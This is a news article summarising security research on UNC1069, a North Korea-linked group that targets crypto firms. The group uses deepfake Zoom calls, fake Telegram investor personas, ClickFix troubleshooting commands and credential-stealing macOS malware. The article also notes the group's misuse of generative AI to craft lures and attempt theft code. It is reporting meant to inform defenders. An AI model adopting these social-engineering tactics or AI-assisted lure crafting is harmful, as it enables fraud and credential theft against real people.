Crypto News: North Korea Hackers Deploy Deepfake Zoom Calls to Target Crypto

Key Insights

• Per the recent crypto news, North Korea-linked UNC1069 deploys deepfake Zoom calls targeting cryptocurrency firms.
• Hackers impersonate venture capitalists on Telegram, schedule fake meetings via Calendly.
• Campaign targets Web3 startups, developers at financial institutions, and venture capital funds.

Crypto news reports reveal that a North Korea-linked group, UNC1069, used deepfake Zoom calls to target crypto firms. The attackers aimed to steal sensitive data during these meetings. Google Mandiant researchers Ross Inman and Adrian Hernandez confirmed the activity.

The campaign relies on social engineering via compromised Telegram accounts, fake video meetings, and AI-generated content to deceive victims.

UNC1069 has been active since at least April 2018. The group carried out social engineering campaigns for financial gain. They used fake meeting invites and posed as investors from reputable companies.

The threat actor is also tracked under the names CryptoCore and MASAN by the broader cybersecurity community.

Crypto News: North Korean Hackers Deploy Seven Malware Families

The latest intrusion documented by Google’s threat intelligence division shows UNC1069 deployed seven unique malware families in a single attack.

The campaign includes several new malware variants, such as SILENCELIFT, DEEPBREATH, and CHROMEPUSH, alongside known tools.

Google’s Threat Intelligence Group reported in November 2025 that UNC1069 used generative AI tools like Gemini to craft lure material. The group tailored this content to cryptocurrency themes. Researchers linked the tactic to its broader social engineering campaigns.

UNC1069 attempted to misuse AI to create code for stealing cryptocurrency. The group also leveraged deepfake images and videos to mimic individuals in the crypto industry.

Since at least 2023, UNC1069 has shifted from spear-phishing techniques and traditional finance targeting towards the Web3 industry.

The threat actor now focuses on centralized exchanges, software developers at financial institutions, high-technology companies, and individuals at venture capital funds.

Latest crypto news shows that the attack begins when victims are approached via Telegram by threat actors impersonating venture capitalists.

In some cases, the attackers use compromised accounts of legitimate entrepreneurs and startup founders. Once contact is established, the threat actor uses Calendly to schedule a 30-minute meeting with the target.

Deepfake Video Calls Create Illusion of Legitimate Meetings

The meeting link redirects victims to a fake website masquerading as Zoom. Crypto news reports show UNC1069 shared meeting links directly through Telegram. The group used the platform’s hyperlink feature to disguise phishing URLs.

They often used the platform’s hyperlink feature to disguise phishing URLs. This tactic made malicious links harder to detect at first glance.

When the victim clicks the link, they are presented with a fake video call interface that mirrors Zoom. The interface urges them to enable their camera and enter their name. Once the target joins the meeting, they see a screen resembling an actual Zoom meeting.

The videos displayed are either deepfakes or real recordings captured from other victims who previously fell prey to the same scheme. Kaspersky is tracking the same campaign under the name GhostCall, which was documented in October 2025.

“Their webcam footage had been unknowingly recorded, then uploaded to attacker-controlled infrastructure, and reused to deceive other victims, making them believe they were participating in a genuine live call,” Kaspersky noted.

ClickFix Commands Trigger Multi-Stage Malware Deployment

The attack advances when the victim sees an error message about a purported audio issue. They are then prompted to download and run a ClickFix-style troubleshooting command to address the problem.

On macOS, the commands deliver an AppleScript that drops a malicious Mach-O binary on the system.

The malicious C++ executable gathers system information and distributes a Go-based downloader codenamed HYPERCALL.

This downloader serves additional payloads, including a Golang backdoor component that provides keyboard access to the compromised system.

Data Theft Tools Target Cryptocurrency Wallets and Credentials

DEEPBREATH manipulates macOS’s Transparency, Consent, and Control database to gain file system access.

The malware steals iCloud Keychain credentials and data from Google Chrome, Brave, Microsoft Edge, Telegram, and the Apple Notes application.

CHROMEPUSH acts as a data stealer and is deployed as a browser extension to Google Chrome and Brave browsers.

The malware acts as a tool for editing Google Docs offline. It records keystrokes, observes username and password inputs, and extracts browser cookies.

“The volume of tooling deployed on a single host indicates a highly determined effort to harvest credentials, browser data, and session tokens to facilitate financial theft,” Mandiant stated.

UNC1069 typically targets cryptocurrency startups, software developers, and venture capital firms. However, this crypto news reveals that the threat actor has expanded its technical capabilities.

The post Crypto News: North Korea Hackers Deploy Deepfake Zoom Calls to Target Crypto appeared first on The Market Periodical.